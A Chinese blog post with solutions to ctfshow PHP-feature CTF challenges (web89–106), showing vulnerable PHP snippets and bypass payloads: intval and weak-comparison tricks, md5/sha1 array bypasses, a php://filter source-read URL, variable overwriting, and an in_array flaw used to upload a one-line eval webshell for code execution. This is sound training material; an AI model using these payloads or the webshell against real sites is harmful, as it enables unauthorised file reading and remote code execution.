php特性(持续更新)

已于 2023-03-30 21:18:18 修改
阅读量261 收藏 1
点赞数
文章标签: php 开发语言 网络安全 安全
于 2023-03-29 18:01:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74427106/article/details/129841910
版权

php特性一些函数的使用

ctfshow web89

打开网页看到题目

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

先分析一下这个php代码

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


include("flag.php");#包含flag.php这个文件
highlight_file(__FILE__);#高亮显出文件

if(isset($_GET['num'])){#isset  检测变量是否已声明并且其值不为 null; get 传入一个数值
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){#绕过数子1——9
        die("no no no!");
    }
    if(intval($num)){#使num为整数
        echo $flag;
    }
}

一下两个函数官方的解释

 它让我们不要输出数字,还需要让num为数字,但看到intval 我们就需要敏感;intval函数还有这一特点:intval处理一个数组对象时,会返回1;所以这里可以使用数组构造:

?num[]=1

从而解出这道题;

web90

先看代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:06:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

这道题和上道题一样只是把数值换一下,让num=4476,还是利用intval这个函数,因为这个函数只读取整数部分所以只需要构造:

?num=4476a

从而进行绕过;

web91

之后补充

web92

弱比较

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:29:30
# @link: https://ctfer.com
*/
 
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

构造

?num=4476e2

具体看这篇博客

http://t.csdn.cn/06EZD

web93

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:32:58
# @link: https://ctfer.com

*/

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

过滤了大小写字母(i代表大小写)

可以利用8进制(因为intval默认为10进制)

构造

?num=010574

web94

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:46:19
# @link: https://ctfer.com

*/

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

相对于上题多了一个strpos

绕过方式在4476加.0

?num=4476.0

web95

不太理解,随后补充;

web96

打开代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 19:21:24
# @link: https://ctfer.com

*/


highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}

看到了u如果对于flag.php就不能得到flag,所以将u进行base64编码;使用php协议

?u=php://filter/read=convert.base64-encode/resource=flag.php

web97

打开代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 19:36:32
# @link: https://ctfer.com

*/

include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

这里是md5碰撞的强比较

直接用数组绕过

post    a[]=1$b[]=2

web98

它又是一种题型,看代码

Notice: Undefined index: flag in /var/www/html/index.php on line 15

Notice: Undefined index: flag in /var/www/html/index.php on line 16

Notice: Undefined index: HTTP_FLAG in /var/www/html/index.php on line 17
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 21:39:27
# @link: https://ctfer.com

*/

include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>

解释一下

$_GET?$_GET=&$_POST:'flag'//如果使用get传参那就用post来代替

$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';//这两行解释一样如果传参的值为flag那么就传入cookie
如果如果HTTP_FLAG=flag那么就显出flag否则就显出_FILE_

这里介绍一下php的三元运算符

a?b:c

如果a正确执行b否则执行c;

回到本题

直接构造

get: ?a=1   post : HTTP_FLAG=flag

get的值随便同时为了打开post

web99

先看代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 22:36:12
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

这里相对于上一题多了一个函数 'array_push'和'rand'和'in_array'

这里利用’in_array‘函数的漏洞

它这里没有对第三个进行规定,

定义 : bool in_array ( mixed $needle , array $haystack , [bool $strict = FALSE ] )

在 $haystack 中搜索 $needle ,如果第三个参数 $strict 的值为 TRUE ,则 in_array() 函数会进行强检查,检查 $needle 的类型是否和 $haystack 中的相同。如果找到 $haystack ,则返回 TRUE,否则返回 FALSE。

但是如果省略了第三个参数,则存在着弱类型比较(类似==)
————————————————
版权声明:本文为CSDN博主「YAy17」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_44770698/article/details/125720695

file_put_contents函数:将参数2的内容写入到参数1中,这里就存在着任意文件上传的漏洞。

由于每次rand都是从1开始的,因此array数组中存在1的概率是非常大的,之后in_array($_GET['n'],$array),当传入的参数n的值为1.php时,假设array中压入了1。由于省略了第三个参数,存在弱类型比较,所以说1.php在比较的时候会强制转换为1,刚好array中存在着1.满足if条件,执行file_put_contents。

故payload:?n=1.php         POST传参为content=<?php eval($_POST[1]);?> (多次尝试,让1压入栈中)

便将一句话木马上传到1.php中,直接RCE。
————————————————
版权声明:本文为CSDN博主「YAy17」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_44770698/article/details/125720695

web100,101,102

看上面链接大佬的博客写的挺好

103同102

104

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:27:20

*/


highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}



?>

多了一个函数

可以的绕过方式

?v2=1post ?v1=1
?v2[]=1post ?v1[]=2

105

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07

*/

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?>
你还想要flag嘛?

值的覆盖

?suces=flagpost: error=suces

106

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:38:27

*/


highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}



?>

sha1的弱比较

直接构造

?v2[]=1post v1[]=2

亲手擦亮那星
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP6新特性分析
10-22
PHP6是PHP编程语言的一次重大更新,引入了一系列新特性以增强其性能和安全性。以下是对这些新特性的详细分析: 1. **Unicode支持**:PHP6开始原生支持Unicode编码,这使得处理多语言环境变得更加便捷。尽管Unicode...
PHP 8新特性简介
12-16
在这篇文章中,我将持续更新预期的内容列表:新特性、性能改进和重大变化。因为PHP 8是一个新的主版本,所以您的代码被破坏的几率更高。如果你一直在更新最新的版本,升级应该不会太困难,因为大多数有破坏性的更改在...
CTFshow-php特性
weixin_44770698的博客
07-11 1872
CTFshow-php特性学习
php特性
weixin_48427966的博客
04-27 535
php特性总结
file_include(攻防世界)
m0_56107268的博客
11-14 6927
php转化器的学习
CTFSHOW-文件包含
Monica的博客
09-12 5510
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
弱类型比较
m0_74317362的博客
07-24 110
弱类型比较
PHP的概要介绍与分析
最新发布
06-07
PHP(Hypertext Preprocessor,即“超文本预处理器”)是一...不断演进的PHP版本,如PHP 8带来了JIT(Just In Time)编译、类型系统改进等性能和语言特性增强,持续提升开发效率与应用性能,证明了其作为Web开发领域核
PHP环境安全加固1
08-08
PHP环境安全加固详解】 随着PHP在Web开发中的广泛应用,其安全性问题日益凸显。本文将详细介绍如何通过启用和配置PHP的内置...然而,安全加固是一个持续的过程,需要定期更新和检查,以适应不断变化的网络安全环境。
深入PHP许愿墙模块功能分析
10-27
2. Move:在拖动过程中持续触发,用于更新许愿条的位置。 3. moveEnd:拖动结束后触发,用于完成拖放操作并执行后续清理工作。 以下是一个简单的示例,展示了如何在HTML中实现拖放功能。通过给许愿条的div元素添加`...
ctfshow 文件包含
m0_74097148的博客
03-25 221
【代码】ctfshow 文件包含。
CTFSHOW WEB入门 php特性 web89-
sinat_41572027的博客
07-11 395
CTFSHOW WEB入门 php特性 web89-100
php 上传文件
在梦中享一刻静谧,等待梦中的你
05-04 495
upLoad.php --> 文件上传 请填写用户名: 请简单介绍该文件 请选择要上传的文件: <?php if(isset($_GET['flag'])){ $f
php中绕过md5检验
sinat_41380394的博客
08-21 2257
&lt;?php if(isset($_GET['v1']) &amp;&amp; isset($_GET['v2']) &amp;&amp; isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 &amp;&amp; md5($v1)...
[WUSTCTF2020]朴实无华
qq_52907838的博客
07-24 315
打开环境,显示: 标题为繁体,意思是:人间极乐bot 看到bot就应该想到robots.txt,访问robots.txt: 看到有个fAke_f1agggg.php,一看就不是答案,但还是要访问: 这明显不是,再看看源码,看看响应头: 有个fl4g.php,再访问: 得到这样一个页面,是繁体,整理翻译后,其中的代码为: <?php header('Content-type:text/html;charset=utf-8'); error_reporti...
南邮CTF--bypass again
weixin_34288121的博客
05-18 486
南邮CTF--bypass again 提示:依旧弱类型,来源hctf 解析: 源代码: if (isset($_GET['a']) and isset($_GET['b'])) {​ if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) == md5($_GET['b'])) die('Flag: '.$flag)...
php特点有,php 的特点有哪些
weixin_42613017的博客
03-11 671
php的特点有哪些?主要特点(一)开源性和免费性由于PHP的解释器的源代码是公开的,所以安全系数较高的网站可以自己更改PHP的解释程序。另外,PHP 运行环境的使用也是免费的。(二)快捷性PHP是一种非常容易学习和使用的一门语言,它的语法特点类似于C语言,但又没有C语言复杂的地址操作,而且又加入了面向对象的概念,再加上它具有简洁的语法规则,使得它操作编辑非常简单,实用性很强。(三)数据库连接的广泛...
CTFShow PHP特性
paidx0
07-03 638
##开始PHP特性 web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; preg_match()返回 pattern的匹配次数。 它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后 将会停止搜索。 可以通
buuctf(探险3)
qq_62046696的博客
08-13 927
if(!strstr($get_flag," ")){ get传参进入的,里面没有空格、str_ireplace(子字符串忽略大小写替换)第二行,就是把get_flag中的cat 换成wctf20220,说白了就是过滤cat那我们先用ls查一下目录可是并没有什么回显,不知道我是哪错了看了大佬解释,说是传入的2e4不需要空格,这些都会自动加上出来了,但是我们查找目录 cat flag中间一定会有空格,的这里肯定是需要一种别的手段绕过一下。...
2021 inux php mysql
01-10
Linux作为开源操作系统,持续受到全球程序员和企业的青睐。随着云计算和大数据的快速发展,Linux在服务器领域占据着主导地位,2021年将继续保持其稳定、安全特性,为企业提供可靠的基础设施。 PHP作为一种流行的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值